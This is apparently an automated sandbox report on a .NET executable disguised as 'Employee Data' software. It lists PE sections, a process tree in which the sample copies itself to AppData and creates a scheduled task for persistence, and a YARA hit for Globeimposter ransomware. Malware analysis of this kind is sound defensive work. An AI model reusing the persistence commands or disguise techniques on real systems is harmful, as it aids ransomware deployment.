                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                      Data Directories

                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5b4b40x57.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x600.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000xc.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                      Sections

                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x20000x595140x59600False0.747973120629data7.44976169273IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0x5c0000x6000x600False0.450520833333data4.23417502301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0x5e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                      Resources

                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                      RT_VERSION0x5c0a00x374data
                                                                                                                                                      RT_MANIFEST0x5c4140x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                                                      Imports

                                                                                                                                                      DLLImport
                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                      Version Infos

                                                                                                                                                      DescriptionData
                                                                                                                                                      Translation0x0000 0x04b0
                                                                                                                                                      LegalCopyrightCopyright Microsoft 2019 - 2021
                                                                                                                                                      Assembly Version1.0.0.0
                                                                                                                                                      InternalNameZYgIA.exe
                                                                                                                                                      FileVersion1.0.0.0
                                                                                                                                                      CompanyNameCamden County College
                                                                                                                                                      LegalTrademarks
                                                                                                                                                      Comments
                                                                                                                                                      ProductNameEmployee Data Part 3
                                                                                                                                                      ProductVersion1.0.0.0
                                                                                                                                                      FileDescriptionEmployee Data
                                                                                                                                                      OriginalFilenameZYgIA.exe

                                                                                                                                                      Network Behavior

                                                                                                                                                      No network behavior found

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:10
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Mm7Yq5V7Lu.exe"
                                                                                                                                                      Imagebase:0x920000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:21
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmp
                                                                                                                                                      Imagebase:0x1050000
                                                                                                                                                      File size:185856 bytes
                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:22
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:22
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:{path}
                                                                                                                                                      Imagebase:0xed0000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:36
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe"
                                                                                                                                                      Imagebase:0x540000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 35%, ReversingLabs
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:44
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp9002.tmp
                                                                                                                                                      Imagebase:0x1050000
                                                                                                                                                      File size:185856 bytes
                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:44
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe"
                                                                                                                                                      Imagebase:0x9e0000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:47
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:48
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:{path}
                                                                                                                                                      Imagebase:0x250000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:49
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:{path}
                                                                                                                                                      Imagebase:0xf50000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:53
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmpB7BE.tmp
                                                                                                                                                      Imagebase:0x1050000
                                                                                                                                                      File size:185856 bytes
                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:54
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:55
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /dde
                                                                                                                                                      Imagebase:0x1f0000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:55
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:{path}
                                                                                                                                                      Imagebase:0x270000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:57
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:{path}
                                                                                                                                                      Imagebase:0x340000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:03:59
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:{path}
                                                                                                                                                      Imagebase:0x330000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:04:00
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:{path}
                                                                                                                                                      Imagebase:0x6b0000
                                                                                                                                                      File size:368640 bytes
                                                                                                                                                      MD5 hash:2F121145EA11B36F9ADE0CB8F319E40A
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:13:04:01
                                                                                                                                                      Start date:06/01/2022
                                                                                                                                                      Path:C:\Windows\System32\notepad.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read-me.txt
                                                                                                                                                      Imagebase:0x7ff657970000
                                                                                                                                                      File size:245760 bytes
                                                                                                                                                      MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:11%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                        Total number of Nodes:120
                                                                                                                                                        Total number of Limit Nodes:7

                                                                                                                                                        Graph

                                                                                                                                                        execution_graph 22447 129dcb8 22448 129dd20 CreateWindowExW 22447->22448 22450 129dddc 22448->22450 22450->22450 22451 1296bd8 GetCurrentProcess 22452 1296c52 GetCurrentThread 22451->22452 22455 1296c4b 22451->22455 22453 1296c88 22452->22453 22454 1296c8f GetCurrentProcess 22452->22454 22453->22454 22456 1296cc5 22454->22456 22455->22452 22461 1296d89 22456->22461 22466 1297178 22456->22466 22457 1296ced GetCurrentThreadId 22458 1296d1e 22457->22458 22462 1296dfa DuplicateHandle 22461->22462 22463 1296d92 22461->22463 22465 1296e96 22462->22465 22463->22457 22465->22457 22467 1297186 22466->22467 22467->22457 22468 524d4f0 22469 524d502 22468->22469 22472 524cd80 22469->22472 22471 524d51c 22473 524cd8b 22472->22473 22478 129784b 22473->22478 22489 129683c 22473->22489 22494 12978ab 22473->22494 22474 524d54b 22474->22471 22479 1297852 22478->22479 22483 12978c4 22478->22483 22480 129683c 2 API calls 22479->22480 22481 1297867 22480->22481 22499 129b858 22481->22499 22505 129b870 22481->22505 22482 12978a0 22482->22474 22484 1297b46 22483->22484 22511 524d100 22483->22511 22514 524dd28 22483->22514 22484->22474 22490 1296847 22489->22490 22491 1297b46 22490->22491 22492 524d100 2 API calls 22490->22492 22493 524dd28 2 API calls 22490->22493 22491->22474 22492->22491 22493->22491 22495 12978b3 22494->22495 22496 1297b46 22495->22496 22497 524d100 2 API calls 22495->22497 22498 524dd28 2 API calls 22495->22498 22496->22474 22497->22496 22498->22496 22501 129b8a1 22499->22501 22502 129b8ee 22499->22502 22500 129b8ad 22500->22482 22501->22500 22517 129bba9 22501->22517 22520 129bbb8 22501->22520 22502->22482 22507 129b8ee 22505->22507 22508 129b8a1 22505->22508 22506 129b8ad 22506->22482 22507->22482 22508->22506 22509 129bba9 2 API calls 22508->22509 22510 129bbb8 2 API calls 22508->22510 22509->22507 22510->22507 22543 524d168 22511->22543 22512 524d10e 22512->22484 22516 129bbf8 2 API calls 22514->22516 22515 524dd36 22515->22484 22516->22515 22523 129bbf8 22517->22523 22518 129bbc2 22518->22502 22521 129bbc2 22520->22521 22522 129bbf8 2 API calls 22520->22522 22521->22502 22522->22521 22524 129bc1b 22523->22524 22525 129bc33 22524->22525 22531 129be80 22524->22531 22535 129be90 22524->22535 22525->22518 22526 129bc2b 22526->22525 22527 129be30 GetModuleHandleW 22526->22527 22528 129be5d 22527->22528 22528->22518 22532 129be90 22531->22532 22533 129bec9 22532->22533 22539 129b000 22532->22539 22533->22526 22537 129bea4 22535->22537 22536 129bec9 22536->22526 22537->22536 22538 129b000 LoadLibraryExW 22537->22538 22538->22536 22541 129c070 LoadLibraryExW 22539->22541 22542 129c0e9 22541->22542 22542->22533 22545 129bbf8 2 API calls 22543->22545 22544 524d177 22544->22512 22545->22544 22445 129df00 SetWindowLongW 22446 129df6c 22445->22446 22546 12963f0 22547 1296400 22546->22547 22551 1296858 22547->22551 22556 129691f 22547->22556 22548 1296411 22552 1296892 22551->22552 22553 1296989 22552->22553 22561 1296ab0 22552->22561 22565 1296ac0 22552->22565 22553->22548 22557 1296924 22556->22557 22558 1296989 22557->22558 22559 1296ab0 2 API calls 22557->22559 22560 1296ac0 2 API calls 22557->22560 22558->22548 22559->22558 22560->22558 22563 1296ac0 22561->22563 22562 1296b07 22562->22553 22563->22562 22569 129672c 22563->22569 22567 1296acd 22565->22567 22566 1296b07 22566->22553 22567->22566 22568 129672c 2 API calls 22567->22568 22568->22566 22571 1296737 22569->22571 22570 12973f8 22571->22570 22573 129682c 22571->22573 22574 1296837 22573->22574 22575 129683c 2 API calls 22574->22575 22576 1297867 22575->22576 22578 129b858 2 API calls 22576->22578 22579 129b870 2 API calls 22576->22579 22577 12978a0 22577->22570 22578->22577 22579->22577 22580 524cb78 22581 524cb8a 22580->22581 22584 524898c 22581->22584 22585 5248997 22584->22585 22588 524899c 22585->22588 22587 524cba4 22589 52489a7 22588->22589 22591 129784b 2 API calls 22589->22591 22592 12978ab 2 API calls 22589->22592 22593 129683c 2 API calls 22589->22593 22590 524d06c 22590->22587 22591->22590 22592->22590 22593->22590

                                                                                                                                                        Executed Functions

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01296C38
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 01296C75
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01296CB2
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 01296D0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 2a898fbd6f1527013423cd5bd5159a2003fdfd66a8c0a8b35aedb60d32e8a9ce
                                                                                                                                                        • Instruction ID: ad79d6fd1f8bc7f9e253384381ea651e2a11972062fc34cdc3355b60865e2028
                                                                                                                                                        • Opcode Fuzzy Hash: 2a898fbd6f1527013423cd5bd5159a2003fdfd66a8c0a8b35aedb60d32e8a9ce
                                                                                                                                                        • Instruction Fuzzy Hash: 8D5164B0D006898FDB14CFA9D548BDEBFF0FF89314F24845AE419A3250DB349849CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01296C38
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 01296C75
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01296CB2
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 01296D0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: a98fda0349e2764ebe6a41c1b8955e73c1c0e43aa06f79ec309310f33ef1299c
                                                                                                                                                        • Instruction ID: 573b08eb428159da648b28101fe54e38f1c73dff4a5e5e09bfa2ec6ef35b7677
                                                                                                                                                        • Opcode Fuzzy Hash: a98fda0349e2764ebe6a41c1b8955e73c1c0e43aa06f79ec309310f33ef1299c
                                                                                                                                                        • Instruction Fuzzy Hash: 455130B0D0064A8FDB14CFA9D548B9EBBF4FF88314F248869E519A3250DB74A844CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1415 129bbf8-129bc1d call 129afa8 1418 129bc1f 1415->1418 1419 129bc33-129bc37 1415->1419 1468 129bc25 call 129be80 1418->1468 1469 129bc25 call 129be90 1418->1469 1420 129bc39-129bc43 1419->1420 1421 129bc4b-129bc8c 1419->1421 1420->1421 1426 129bc99-129bca7 1421->1426 1427 129bc8e-129bc96 1421->1427 1422 129bc2b-129bc2d 1422->1419 1423 129bd68-129be28 1422->1423 1463 129be2a-129be2d 1423->1463 1464 129be30-129be5b GetModuleHandleW 1423->1464 1429 129bca9-129bcae 1426->1429 1430 129bccb-129bccd 1426->1430 1427->1426 1432 129bcb9 1429->1432 1433 129bcb0-129bcb7 call 129afb4 1429->1433 1431 129bcd0-129bcd7 1430->1431 1435 129bcd9-129bce1 1431->1435 1436 129bce4-129bceb 1431->1436 1434 129bcbb-129bcc9 1432->1434 1433->1434 1434->1431 1435->1436 1439 129bcf8-129bd01 call 129afc4 1436->1439 1440 129bced-129bcf5 1436->1440 1445 129bd0e-129bd13 1439->1445 1446 129bd03-129bd0b 1439->1446 1440->1439 1448 129bd31-129bd3e 1445->1448 1449 129bd15-129bd1c 1445->1449 1446->1445 1455 129bd61-129bd67 1448->1455 1456 129bd40-129bd5e 1448->1456 1449->1448 1451 129bd1e-129bd2e call 12999b0 call 129afd4 1449->1451 1451->1448 1456->1455 1463->1464 1465 129be5d-129be63 1464->1465 1466 129be64-129be78 1464->1466 1465->1466 1468->1422 1469->1422
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0129BE4E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 8721d1d45b6888f6a92e31812b176e397ee721fa318ca5ca0b83e1b6aaeb97f0
                                                                                                                                                        • Instruction ID: 138366af2e21ab88e746d4296f87dcfa95b08c63e54b0d8642e1829ef788c8ed
                                                                                                                                                        • Opcode Fuzzy Hash: 8721d1d45b6888f6a92e31812b176e397ee721fa318ca5ca0b83e1b6aaeb97f0
                                                                                                                                                        • Instruction Fuzzy Hash: 82813770A10B468FDB24CF6AD045B9ABBF5BF88204F00892ED586D7A50DB75E846CF91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1470 129dcad-129dd1e 1472 129dd29-129dd30 1470->1472 1473 129dd20-129dd26 1470->1473 1474 129dd3b-129dd73 1472->1474 1475 129dd32-129dd38 1472->1475 1473->1472 1476 129dd7b-129ddda CreateWindowExW 1474->1476 1475->1474 1477 129dddc-129dde2 1476->1477 1478 129dde3-129de1b 1476->1478 1477->1478 1482 129de28 1478->1482 1483 129de1d-129de20 1478->1483 1484 129de29 1482->1484 1483->1482 1484->1484
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0129DDCA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
